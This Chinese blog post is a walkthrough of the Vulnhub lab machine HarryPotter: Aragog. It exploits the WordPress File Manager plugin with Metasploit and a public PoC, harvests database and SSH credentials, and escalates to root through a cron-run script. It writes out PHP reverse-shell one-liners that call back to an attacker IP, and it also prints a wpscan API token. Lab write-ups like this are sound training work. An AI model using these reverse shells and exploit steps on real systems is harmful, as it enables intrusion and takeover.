• Vulnhub系列靶机---HarryPotter-Aragog-1.0.2哈利波特系列靶机-1

    文章目录

    靶机文档:HarryPotter: Aragog (1.0.2)

    下载地址:Download (Mirror)

    image-20230909141557109

    方式一

    信息收集

    主机发现
     sudo arp-scan -l

    • 1

    image-20230909142434034

    端口扫描

    image-20230909142758976

    目录扫描

    image-20230909143001315

    看到这里扫出来目录中,index.htmljavascript, server-status,blog下的部分目录,并且出现了wp-login.php,这也说明了这是一个wordpress的cms框架

    index.html

    在这里插入图片描述

    blog

    网页没有样式

    image-20230909143611031

    查看网页源码

    image-20230909145217560

    做域名ip映射 /etc/hosts

    域名:wordpress.aragog.hogwarts IP:自己要访问靶机的机器的IP地址

    image-20230909150646841

    发现是 WordPress 系统,用 wpscan 扫一下,加上 api-token 扫:

    wpscan工具

    WPScan是一个扫描WordPress漏洞的扫描器,可以扫描出wordpress的版本,主题,插件,后台用户以及爆破后台用户密码等

    wpscan --api-token=blsnsog49N5d0UwAIYACcXs3fKbchB7JpbCgNutJRHA --url http://192.168.80.143/blog -e p --plugins-detection aggressive

    • 1

    image-20230909152924966

    可以 发现该站点的插件中有很多漏洞,而且都是关于file Manager的

    漏洞利用

    msf工具
    msf6 > search wordpress file manager

    • 1

    image-20230909152800629

    use 1
info

    • 1
    • 2

    查看需要配置的信息

    image-20230909153122178

    需要配置rhost(目标主机),targeturl(目标网址),这个目标网址会自动跟前面的目标主机拼接,所以我们直接把rhost设置为靶机的ip,targeturl设置成/blog即可,这里因为使用的是反向,所以还需要配置自己的主机ip

    image-20230909153409333

    hagrid98家目录下得到一串base64格式加密的数据

    image-20230909153659725

    使用BurpSuiteDecoder功能解码

    image-20230909154142824

    image-20230909154319918

    数据库权限

    找一下数据库的用户名密码,查看数据库中有没有可利用信息

    在**/etc/wordpress里可以打开config-default.php**。这里记录了MySQL的用户名密码,可以用于登录数据库

    image-20230909154904019

    登录数据库之前得首先得获取一个tty shell,不然我们在数据库中的命令就看不到回显(可以理解为将非交互式shell变成了交互式shell),输入下面命令即可拿到tty shell

    image-20230909155308470

    image-20230909155207845

    使用得到用户名root,密码mySecr3tPass,来连接数据库

    image-20230909155552313

    wordpress数据库保存的用户名和密码一般都放在wp_users表里面的

    image-20230909155648996

    在线解密网站

    image-20230909155752228

    用户名:hagrid98,密码:password123

    用户权限

    尝试SSH远程连接

    image-20230909160013119

    root提权

    使用sudo suid查询后发现没有可利用的

    image-20230909160301316

    然后查找备份文件,查看有没有.sh结尾的文件

    find / -name '*.sh'

    • 1

    image-20230909160243232

    image-20230909160620277

    推测应该被写入了计划任务,这里我们建立一个反弹shell的脚本并通过它这个计划任务来执行

    在tmp文件下创建反弹shell的php脚本并命名为a.php,脚本代码如下

     $sock=fsockopen("192.168.80.141 ",6868);exec("/bin/sh -i <&3 >&3 2>&3"); ?>

    • 1

    image-20230909164505639

    /usr/bin/php是php的执行文件的目录,这样才能执行php文件

    其实也可以直接在.backup.sh里面直接写一个反弹shell

    kali监听6868端口

    image-20230909161708723

    拿到root后可以使用crontab -l,查看当前用户的计划任务列表

    image-20230909162429837

    image-20230909164442869

    方式二

    信息收集

    gobuster扫描
    └─$ gobuster dir -u http://192.168.80.143 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html

    • 1

    image-20230909165253792

    wpscan扫描
    wpscan --api-token=xxxxxxxxxxxxxxxxxxxxxxxxxxxx --url http://192.168.80.143/blog -e p --plugins-detection aggressive

    • 1

    image-20230909165849419

    漏洞利用

    POC

    访问https://wpscan.com/vulnerability/e528ae38-72f0-49ff-9878-922eff59ace9

    image-20230909170028124

    wget https://ypcs.fi/misc/code/pocs/2020-wp-file-manager-v67.py到本地

    查看脚本的使用方法

    image-20230909170702430

    生成反弹 shell写入到payload.php文件里

    php -r '$sock=fsockopen("192.168.80.141",6868);exec("/bin/sh -i <&3 >&3 2>&3");'

    • 1

    image-20230909171334454

    运行脚本,得到反弹shell地址

    image-20230909171426970

    地址中多写了一个/blog,删除即可

    image-20230909171908665

    等一会就反弹到了

    image-20230909172037019

  • 相关阅读:
    Linux--CE-->DNS服务器详解
    Python013--爬虫01(工具准备)
    【数据开发】DW数仓分层设计架构与同步策略(ODS、DWD、DWS等字段含义)
    Linux系统--nginx的使用
    HoloLens联合发明人:打造理想的全天AR需要解决这些问题
    OOP设计原则详解
    笔尖笔帽检测3:Android实现笔尖笔帽检测算法(含源码 可是实时检测)
    最大内切圆算法计算裂缝宽度
    遥感高光谱笔记-高光谱遥感图像处理与信息提取
    Nginx学习
  • 原文地址:https://blog.csdn.net/ZhaoSong_/article/details/132780068